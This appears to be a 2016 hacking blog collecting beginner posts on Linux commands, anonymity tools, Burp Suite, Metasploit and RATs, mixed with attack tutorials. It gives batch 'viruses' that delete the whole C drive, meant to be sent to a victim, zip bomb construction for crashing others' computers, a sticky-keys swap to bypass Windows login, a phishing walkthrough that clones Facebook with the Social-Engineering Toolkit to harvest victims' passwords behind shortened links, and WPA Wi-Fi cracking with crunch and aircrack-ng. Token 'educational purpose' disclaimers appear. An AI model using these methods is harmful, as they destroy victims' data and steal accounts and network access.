Tuesday 31 May 2016

Basic Commands for Linux



Hello Friends,
Today i am going to tell you some basic commands of linux which you in TERMINAL to speed up your works...
This are the BASIC COMMANDS FOR BEGINNERS ONLY...


File Operations


pwd                          Print Working Directory(Name of current directory)
cd                             Changing The Working Directory (like windows)
cp                             used Copy Files Or Directory
rm                            Remove Files And Directory (delete)
ls                              List Of Directory
mkdir                       Make Directory (make new folder)
cat                            Concatenate Files And Print On Standard Output(terminal)
mv                            Move Files
chmod                     Change Files Permissions


Know Your System

uname                         Print System Information
who                            Show Who Is Logged On
cal                              Displays Calculator
date                            Print System Date And Time
df                               Report File System Disk Space Usage
du                               Estimate File Space Usage
ps                               Displays Information Of Current Active Processes
kill                             Allows To Kills Process (use to end process )
clear                           Clear The Terminal Screen
cat                              to Display
meminfo                    Display Memory Information


Compression

tar                            Store and Extract Files From An Archive File
gzip                         Compress Or Decompress Named Files



Network

ifconfig                      To Config Network Interface
ping                           Check Other System are reachable from The Host System
wget                           Download Files From Network
ssh                             Remote Login Program
scp                             Secure copy (remote file copy program)
ftp                              Download/Upload Files From/To Remote System
last                             Displays List Of Last Logged In User
telnet                         Used To Communicate With Another Host Using the Telnet Protocol


Searching Files

find                          Search For Files In A Directory Hierarchy
locate                       Find Files By Name


Other Commands

join                            lines of two files on a common field
fold                           wrap each input line to fit in specified width (used in formatting)
date                           print or set the system date and time
vim                           a programmers text editor






ALSO READ THIS:-







File-system Hierarchy Standard (FHS) in Kali Linux





Hello Friends,
Today i am going to tell you something about file system in Kali-Linux or any Linux distributions. File system Hierarchy Standard (F.H.S) defines the directory structure and directory contents in Linux operating systems.




"Think of a refrigerator that has multiple shelves that can be used for storing various items. These shelves help you organize the grocery items by shape, size, type, etc. The same concept applies to a file system, which is the embodiment of a method of storing and organizing arbitrary collections of data in a human-usable form."






Different Types of Filesystems Supported by Linux:-

  • Conventional disk filesystems: ext2, ext3, ext4, XFS, Btrfs, JFS,NTFS, etc.
  • Flash storage filesystems: ubifs, JFFS2, YAFFS, etc.
  • Database filesystems
  • Special purpose filesystems: procfs, sysfs, tmpfs, debugfs, etc.

This section will describe the standard filesystem layout shared by most Linux distributions.
 Based on Debian-package compliance, Kali Linux ( or any Linux ) follows this  FHS. This means it allows all Linux users to easily locate binaries, support files, libraries, etc. Kali Linux has more than 300 penetration testing tools and you will be able to call any tool from anywhere on the system as every application is included in the system path. Unlike Backtrack, you do not have to navigate, just type the command name of the tool in root terminal and you are set to go.


Partitions and Filesystems

A partition is a logical part of the disk, whereas a filesystem is a method of storing/finding files on a hard disk (usually in a partition). By way of analogy, you can think of filesystems as being like family trees that show descendants and their relationships, while the partitions are like different families (each of which has its own tree).







Also READ this:-


WI-FI Hacking Without WORDLIST using KALI LINUX

Hack FACEBOOK using Kali-Linux - Step Wise




Sunday 29 May 2016

VIRUS using BATCH Files


BATCH FILES-

A batch file contains a series of DOS commands, instead of typing the same commands over and over, you can simply double-click the batch file and work has been done. Writing a batch file is easier than it looks; the difficult part is making sure that everything happens in the right order. Well-made batch files can save you a lot of time over the long run, especially if you deal in repetitive tasks.

1-Open Notepad.
2-Learn some basic batch commands.
like-
  • ECHO - Displays text on the screen
  • @ECHO OFF - Hides the text that is normally output
  • START - Run a file with it's default application
  • REM - Inserts a comment line in the program
  • MKDIR- Create and remove directories
  • DEL - Deletes a file or files
  • COPY - Copy a file or files
  • XCOPY - Allows you to copy files with extra options
  • FOR/IN/DO - This command lets you specify files.
  • TITLE - Edit the title of the window.
3-Save the file.
 Once you have entered your code, you can save the file using the Batch filetype. Click File → Save As.... save "anyname,bat" and run it as administrator.



Examples-


1- Shut Down Virus using Batch file

 @echo off
 shutdown /s -t 00 -c "Hackers Rockers was here and he did this"
 READ *

Save it as  " Anyname.bat " in All Files and send it to the victim.

Also read :-



    2-This Virus Deletes All The Content Of C Drive...

   @echo off
   del %systemdrive%*.* /f /s /q 
   shutdown -r -f -t 00 

   Save The Above Code As Anyname.bat

   Also read :-





Hide yourself using PROXIES





Hey Friends,
Today i am going to tell you four ways to hide your self via surfing through PROXIES. There are the simple ways to switch your locations anywhere in the world of WWW.
PROXIES are used to bypass some firewall restrictions, maintaining anonymity or for many other purposes.
The best examples of proxies is when your college firewall doesn’t allow you to connect to a social site (like Facebook), Then you use a proxy server to bring the web page from Facebook and serve you.
Proxy servers simply act as an intermediate between your machine and actual server(like facebook).

Benefits of using PROXIES

1- It is a lightweight and easy to use.
2- System or applications not became slow.
3- changes your location(automatically).
4- you can assess any site (bands sites also).
5- used to bypass a firewall.
6- used to maintain anonymity.

Ways to use PROXIES


1-In Web Browser (using extensions)

There are many extension available for the browser in the store of the browsers which is very useful  simple and easy to use. Add extensions in your browser like " Browsec " (in Google Chrome and Mozilla Firefox )


2-Using software's and applications 

There are many apps available in internet to hide your ip...there's app is easy to use and freely available on internet. They automatically keep changing your IP after a particular interval of time. As an example, ‘Ultrasurfer’ (freeware) , cyberghost (paid). etc.


3-Using websites 

Many websites (e.g. hidemyass.com ) provide free services to hide you IP address. (some are free or some are paid) You can directly visit other websites through them. Although the methods, mentioned above are better for long term, this can be used if you urgently need to visit any website without your service provider or anyone else finding out 


4-Setting in Web Browser

Steps:-
1. First go to google search and type " my ip " (without quotes)
2. Then search for ‘fresh proxies ’ you will get many sites providing you list of IPs and respective port numbers.
3. Now copy the IP and port no.
4. then go to your browser like In Mozilla Firefox browser, go to Tools->Options->Advanced->Network->Settings. Check the option “Manual Proxy Configuration” , fill IP and port no. You can configure the proxies in any browser.
5. Check out again your ip in google it is different...that it.




Also Read :-

Friday 27 May 2016

C Drive Deletion Attack (step wise)




Hey Friends
Today  i m going  tell you...How To Make Dangerous Computer Virus ?
it is very simple ans very powerful.
it is very Harmful ... and this virus is made up by using batch file.
No software is required to make this Dangerous Computer virus, Notepad is enough for it.
The best thing about this virus is that..The AntiVirus can not detect it.
Therefor you can easly make this and use it any computer.
This virus will able to Delete the C Drive completely.


So Lets Start....


1. Open Notepad

2. Now Copy below code in notepad

@Echo off
Del C:\ *.* |y

3. Save this file as Virus.bat

4. Now, running this file will delete all the content of C Drive.(please don't do this...it is not a reversible process)


that's it. ...




Also read
AMAZING AND COOL TRICKS TO SPEED UP THE INTERNET CONNECTION

RECIPE of BOMB (Step-Wise)



Hey, Friends
Today i am going to teach you to make bomb and when this bomb will blast your system will freeze.

That bomb called zip bomb, also known as a zip of death or decompression bomb, is a malicious archive file (.rar or .zip files) designed/used to crash program or system.

A zip bomb is a small file up to a few hundred kilobytes (kb). and when ever the file is unpacked (unzipped) its contents are more than the system can handle ( in gb,tb,pb).

A zip bomb can able to disable your antivirus (depends upon the code).

New antivirus application can detect whether a file is a zip bomb or not.



HOW TO MAKE A ZIP BOMB

1-Create a new text file,name it a.txt

2-Open and type the null character (alt + 255) in it.

3-Now press Ctrl + A then Ctrl + V a couple times (10-20 times) to make some null bytes.

4-Now make several copies of a.txt in the same directory and name them accordingly.

5-Now, Open Command prompt and navigate to the folder containing a.txt . 
Type -
               "  copy /b *.txt b.txt  "    (without quotes)

6-This will write all the contents of a.text and its copies into a new text file called b.txt,hence making every copy is a super copy. Repeat the above steps from  from 1 to 5 to make a really big text file (appx 1 gb).

Once you have a nice empty big text file like 1gb or more,then compress it using Winrar, Winzip or 7zip  into a zip file.

You will find that it will be compressed to very small size (about 1MB ). It is because of the simple construction of the file as the text file contains 1gb of null bytes.


NOTE
:- Please DON'T OPEN THIS afterwards.

Link to download a zip bomb....
 42.zip ( click here to download)




USES OF ZIP BOMB
1- Its is very useful in DOS or DDOS attack. 
2- It is very simple and oftenly used to crash others computers. 

HIDE Your DATA Behind the IMAGE (Step-Wise)




Hey, friends
Today I am going to tell you about Steganography. Steganography is the art and science of hiding messages, Images, Data etc. in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data- security through obscurity.
By using this small and neat trick you can hide whatever data you want behind any image of your choice without reducing its quality,
There are no any hi-fi softwere or application ...ypu just need Winrar , Winzip , 7zip there applcation help you to convert your folder to .rar that's all.

STEPS


  1. Create a folder named "HIDE" (you can use any name).
  2. Now put anything to the folder you want to hide.
  3. Put the image in the same folder in which your HIDE.rar folder has and say “image.jpg”.
  4. After putting everything you want to hide in the “hide” folder, Right click on it, and click “Add to Hide.rar” or “Add to archive”. Our goal is to create a HIDE.rar file of the “Hide” folder.
  5. Now you should see the “HIDE.rar”created in the same directory.
  6. Now we need to open command prompt(cmd) and change the working root directory to your current directory and type the following commands.
  7. ►cd C:\\ (path where HIDE.rar has been stored)
    ►Copy /b image.jpg + hide.rar output.jpg
  8. After executing the following command, we will see an extra image called “output.jpg”.
  9. Now you can delete all the files except “output.jpg”. If you double click the file, it opens a normal image. But you can see the hidden files by opening the file with winrar or 7zip (Right Click->Open With->Choose WinRar or 7zip).





                              









Also read:-

RECIPE of BOMB (Step-Wise)






tages - hide + hide date + hide data behind image +  send data privately +  computers tips & trick to hide data.

Thursday 26 May 2016

Burp- Suite



The Burp Suite


Burp Suite is an integrated platform used for penetrating web sites & web applications.It is a JAVA based application. It contains numerous sub tools(tabs). Burp Suite provides interfaces between User and browsers. Burp suite is designed to facilitate and speed up the process of hacking or testing on web sites & web application.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
To know more about Burp Suite & Download ....Please click here (for official website).


Some of its tools


Proxy: In Burp Suite, Proxy tab is an interactive HTTP proxy server for attacking and testing web applications.It is used to inspect and modify the traffic between your browser and the web in both directions.It is like the  man-in-the-middle between the browser and the target web app/server.

Spider: In Burp Suite, Spider is a tab used for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.


Scanner: Scanner tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by hackers and penetration testers.


Intruder: In Burp Suite, Intruder is a tool used 
for performing powerful customized attacks to find and exploit unusual vulnerabilities.

Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens.


Comparer: In Burp Suite  Comparer is a simple tool(tab) for performing a comparison between any two items of data. In the tearms of attacking a web application,basically it helps to find difference between two or more attempts of attack  


Advantage to use BurpSuite

1- Simple JAVA Based application
2- Ease to install and simple to use
3- It allowing us to easily write your own plugins, to perform complex and highly customized tasks         within Burp.
4- The ability to save your work and resume working later.





tages- burp suite + brup + hack web site +  hack web page + hacking application +hacking software 

Tuesday 17 May 2016

ways to HACK LIVE WEB-SITE




Hey Friends,
     Today I am going to tell you some common ways to hack a live web-site but before that I WANT TO SAY THAT THESE ARE ILLEGAL ACTIVITIES IF YOU GOT CAUGHT THEN YOU CAN GO TO JAIL ALSO. 


SQL INJECTION ATTACKS

-SQL stands for STRANDED QUERY LANGUAGE
-SQL is the language for creating/upadating/modifying a DATA-BASE 
-SQL injection is also called code injection technique in which we insert sql command in between         URL of any web-site
-It is used to attack data-driven applications 
-It used to dump the database contents to the attacker
-SQL injection must exploit a security vulnerability in an application's software


DDOS ATTACK 

-Now a days most popular and most widely used are DDoS attacks  
-DDoSing is highly illegal
-DDoS stands for Distributed Denial of Services, 
-DDoS attack help to sending tons of URL requests to a website or a webpage in a very small amount of time..because of this web-site or web page is temporarily unavailable for the users


REMOTE CODE EXECUTION ATTACKS

-This type of vulnerability is extremely dangerous
-This attack bears many resemblances to SQL injection in that the attacker manipulates input to cause execution of unintended commands
-Remote Code Execution attack is a result of either server side or client side security weaknesses.
-To perform RCE attacks you need to use PHP function such as passthru() or eval() etc
-In this attack, the hacker is basically able to get complete access to the website’s server itself.


SOCIAL ENGINEERING ATTACKS

-A social engineering attack is one of the best & my favorite way to go inside and it is the simple one   as well as powerful.
-It is Technique which is used to play "con games" over internet
-It happens when you steal/get private information  from the web-site such as a credit card number,      email ,password and other details which is useful for hackers.
-A  social engineering popular attacks are Baiting, Spear, phishing,  Phishing Scareware etc..

Way to METASPLOIT


Introduction METASPLOIT

According to Wikipedia....
"The Metasploit project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development."

-Metasploit is a tool developed by HD Moore in 2003.
-Metasploit and all of it’s exploits are written in Ruby Language.
-It is also knows as anti-forensic and evasion tools
-It is used to exploit vulnerabilities in background running on an open port. 
-It is extremely powerful tool that is not easy to control.
-It is the most essential hacker tool.
-It is powerful, flexible, free, and loaded with awesomeness. 
-It is without a doubt the coolest offensive tool covered in this website. 
-Every professional PenTester use “Metasploit” every single day.


What are exploits?

Exploits are highly specialized small programs, whose only purpose is to take advantage of a vulnerability and deliver a payload, which will grant attacker the control. Metasploit is a great tool that has a vast number of exploits tools.


What is a vulnerability?

A vulnerability is a security hole (loop hole) in a software or application, hardware or operating system that provides a potential angle to attack the system. Not all vulnerabilities are dangerous and not all of them are exploitable. They can be often found in outdated applications, services or operating systems.


How to get IT?

You can run metasploit in both Windows and Linux.

Windows – You can download it from : http://www.metasploit.com/
Kali-Linux & BackTrack – Metasploit, tools comes pre-installed.





HOW TO ACCESS OTHER'S COMPUTER VIA INTERNET - RAT

Hello EveryOne,

       Today I am going to introduce "Remote Administration Tools". These are generally called RATs, They have a murderous bite. RATs form an entire class of hacking including trojan infections, backdoors etc. But to go further, we need to clear up the basics concepts first,
(Backdoor is something that gives the attacker access to the victim’s system without their knowledge)


What’s a RAT?

RAT stands for "Remote Administration Tool".
It is mostly used for malicious purposes, such as controlling remote Computer,  stealing victims data, deleting or editing some files....during the time of desktop sharing and remote administration activities.

How to spread it?

 RATs can spread over -

-File sharing services (Torrents, mostly..),
-Messenger or at the time of chatting ,
-By email spams ,
-It may be send to you by hiding it behind other software/application. 

Could a antivirus catch a RAT?

The answer of this question is "Yes" . Actually, Anti-virus treat it as a virus.
But this problem has a solution – Encryption.... Bind the program in .zip or .rar therefore antivirus can't detect it .

RAT's Software's

some RATs are legal, and some are not.

Legal are the ones without a backdoor, and they have ability to close connection anytime. It requires permission to get into another system.
►TeamViewer (Commonly used )
►Ammyy Admin
►Mikogo

Illegal are the ones with a backdoor, and they have abillity to close the connection at anytime.
►Spy-Net
►Turkojan
►ProRat


What exactly RAT do?


Basic functions of RAT are -

-Delete/Modify/Execute file ,
-Screen/camera capture or image control ,
-Get passwords or private data using Keylogger ,
-View and control remote desktop ,
-Use your computers hardware like camera, Control mic , mouse, keyboard input etc ,
-Almost everything it can do with your computer.


ANONYMITY & PRIVACY ON YOUR SMART-PHONE





Hey Friends ,

      Today I am going to tell you some common App's to stay ANONYMOUS from your smartphones (Android phones) during surfing.  Hackers, telephone companies, governments, and other third parties obtain(get) all sorts of your personal data from your smartphone,
     "Mobile phones are  used as a tracking devices",
      That’s not good for us. Mobile devices like phones, fablets and tablets are the most popular and fastest-selling devices. If we can’t figure out privacy for our smartphones,we can easily track-down.



Orwall

This applications providing enough privacy in order to avoid sending out your complete device information.
To know more & Download ...Please visit its official site.


Orweb







This app is Open Source
This applications providingweb access that is able to circumvent web filters and firewalls.
To know more & Download ...Please visit its official site.


Orbot


This is simple and  most essential app for our phones.
It actually make that connection to Tor.
It is available in play store ...just Download it & use it.


VPN Technique - SurfEasy



Connecting to the internet through a virtual private network (VPN) effectively way.
Your Android device, will be completely anonymous. 
 The VPN act as an encryption tunnel, ensuring that all data passed between your device and the internet is safe, 
it also acts as a proxy, showing that you are in an entirely different region of your choice.
A VPN will also protect your Android device from hackers as well as from companies who wants   your personal data
It is available in play store ...just Download it & use it.






tags - stay anonymous + stay anonymous using phone + privacy in mobile phones + be secure during surfing via mobile phone +  protection to steal data + stay hide + stay hide or anonymous while browsing,


Tuesday 10 May 2016

STAYING ANONYMOUS while SURFING


Hey, Frineds
     Today I am going to tell you some common ways to stay ANONYMOUS during surfing ,
there are some common and easy ways to hide yourself while using INTERNET.
The four common ways are TAIL O/S , TOR Browser , VPN , CHAIN PROXY (not mentioned here).
So lets start without wasting more time on these un-used introduction.



TAILS O/S


Tails operating System is a complete package of o/s + browser(named as tor).
It is Debian-based Linux distribution.
Used for providing privacy and anonymity.
The official web-site of tor says that , "it is nothing but an OS that comes with all applications customized for privacy and anonymity"
All its outgoing connections are forced to go through Tor and non-anonymous connections are blocked.
It can be easly bootable in live cd or pendrive and you can be able to use it anywhere,
it don't leave any clue.

How To Use
Go to their official website and read its documentation for more information.
Download it
use it on live CD or in bootable pendrive

Note:- Do not assume that you are completely anonymous.



TOR BROWSER BUNDLE


Tor is free browser software
used for enabling anonymous communication.
It prevents somebody watching your Internet connection from learning what sites you visit
It helps you to access web-sites which are blocked.
It is better than to download Whole o/s just download a browser which provides same level of anonymity.


How To Use
Go to their website and read the documentation.
Download the latest browser bundle.
Read the documentation.
Install and run.

Note:Browsing is annoyingly slow, because of traffics.




VPN







VPN satands for Virtual Private Network
VPN, is a group of computers networked together over a public network.
A virtual private network extends a private network across a public network, such as the Internet
A VPN is created by establishing a virtual point-to-point connection.
VPNs can allow to securely access a intranet





Advantages of using a VPN?
Your data is encrypted.
No-one can eavesdrop your communications.
Your privacy is ensured.
You can pretend to be someone you are not (You wanna use some service which is banned in your country, VPN is the answer).
You can overcome browsing restrictions imposed on you.
Login to your home or Work network from anywhere with confidence.
Hide your voice/VOIP calls.
Hide yourself Cause you like to be anonymous by using vpn.





tag-  staying anonymous + vpn + tor + tail + stay secure + secure Surfing + protected surfing + hide our self 

Monday 9 May 2016

HOW TO UNLOCK - WINDOWS USER PASSWORD

Bypass Admin Password For A Windows Operating System



Requirements:

1) Bootable Pendrive with Linux
2) Patience and Time


Procedure:

1)Insert the live CD/Usb and boot from it.

 for the instruction click & read...

2)Locate the drive where Windows is installed. (C drive)
 then Go to Windows/system32 folder.

3)Find out a file named 'cmd.exe' and rename it to 'cmdx.exe'

4)Next find another file by the name 'sethc.exe' [It is the program for windows sticky keys]
Rename sethc.exe to cmd.exe

5)then rename cmdx.exe to sethc.exe.

[Swap these .exe files ]

5)Great! Now Shutdown and boot into Windows O/S.

6)Press shift key 5 or 6 times on the login screen(Password screen).

7)Now the command prompt will open up.
then
Type " net user " this without quotes and hit enter.
Type " net user <space> <Account Name> <space> * "
Now  it will ask you for the password
type your new Password

.

Note:- Please Don't forget to Change back sethc.exe to cmd.exe .






tags - windows + password break + unlock + hack + bypass password + window lock screen hack + computer tips & trick.
  

Saturday 7 May 2016

Hack FACEBOOK using Kali-Linux - Step Wise


Hello, everyone ,
Today i am going to hack Facebook account for you , using Kali-Linux.
It is like phishing method but don't worry , you don't need to do all that heavy steps again,it is very simple all the stuffs(steps) is done by Kali Linux ....


NOTE-  THIS IS FOR EDUCATIONAL PURPOSE ONLY,  PLEASE DON'T DO ANYTHING  ILLEGAL ACTIVITIES, 
If you still do then the cops will be standing outside your door in 2 minutes depending upon their car speed

Requirements:

1- Laptop or Computer.
2- Net connection with speed.
3-  Kali Linux installed system or bootable pendrive with kali linux .
  for the instruction click & read...


Process:

1) Open terminal using " CTRL + ALT + T "
2)  type " sudo root " command (if you are not a root user)
3)  enter your password
4)  do all three steps if you are
not a root user.

Now,main steps 

5) go to " Application " on the top left hand side
6) then  go to " kali linux "
7) then go to " Exploitation tools"
8) then go to " social engineering toolkit "
9) then go to " setoolkit "

Now it will so you some options -

10) press " 1 " for Social Engineering Attacks
11) press " 2 " for Website Attect Vector
12) press " 3 " for Credential Harvesting Attect method
13) press " 2 " for Site Cloner
14) now it will ask you " Harvester/Tabnabbing " 

15) now, open new terminal by pressing " CTRL + ALT + T "
16) type " ifconfig " it will help you to show your ip address
17) copy your ip address and paste after  Harvester/Tabnabbing : XXX.XX.XX.XXX
18) then it will ask a website name- enter - " www.facebook.com ".

*19) now the most important step
        now change your XXXXXXXXXX (number or ip-address) to link like                             www.facebook.com/pages/for/hack......etc.
by using services like ADF.LY ,  Goo.gl, Binbox, etc.

20) now , you send that ip address to the victom/tragets by email /watsapp / mail.
21)when every victom/trageted user click on your link & enter id & passwords....it will save in your system in  
Home--> Root-->  var --> www--> xyz.txt

Screen shots:



















tags - kali linux * se tool kit * linux * kali * social engine * hack * facebook * step wise * fast hacking * simple hacking * powerful hacking * hacking .

Friday 6 May 2016

WI-FI Hacking Without WORDLIST using KALI LINUX





Hey Friends,
Today I am Going To Show You How To Hack Wifi Wpa And Wpa2 Using Crunch Without Creating Wordlist, most of the hacking methods that you find on internet are cracking wifi using wordlist, a wordlist contains millions of words(that can be used as a password).


NOTE-THIS IS FOR EDUCATIONAL PURPOSE ONLY,  PLEASE DON'T DO ANYTHING  ILLEGAL ACTIVITIES, 

STEPS

STEP 01> Open Terminal in KALI-LINUX

STEP 02> type "wifite"  (without double inverted coma)

STEP 03> after entering first command and then a wifi list will be generated on your screen , when you see the targeted wifi name & its details then press CTRL+C

STEP 04> then enter the number of targeted wifi in the list

STEP 05> then kali linux try to handshake and capture a file in which  store the details of targeted wifi

STEP 06>after the successful massage ...go to "Home" Directory where a new directory is created with the extension of "XXXXXXXX.cap" file

STEP 07>now type "crunch n m PassPhrase | aircrack-ng handshake.cap -w - - e NameOfTheNetwork"
eg- crunch 10 10 0123456789 | aircrack-ng XXXXXX.cap -w - - e Rohit_wifi

STEP 08>now, just go to sleep & have patience....it will take appx 8-15 hours to hack someones wifi.


List of Commands 
- wifite
- press CTRL+C
- enter number fo target wifi
crunch 10 10 0123456789 | aircrack-ng XXXXXXXX.cap -w - - e NameOfTheNetwork 


Screen Shots



WINDOWS SUBSYSTEM FOR LINUX

Microsoft partnered with Canonical (creator of Ubuntu) to bring Linux environment experience in Windows 10. Through Windows Subsystem F...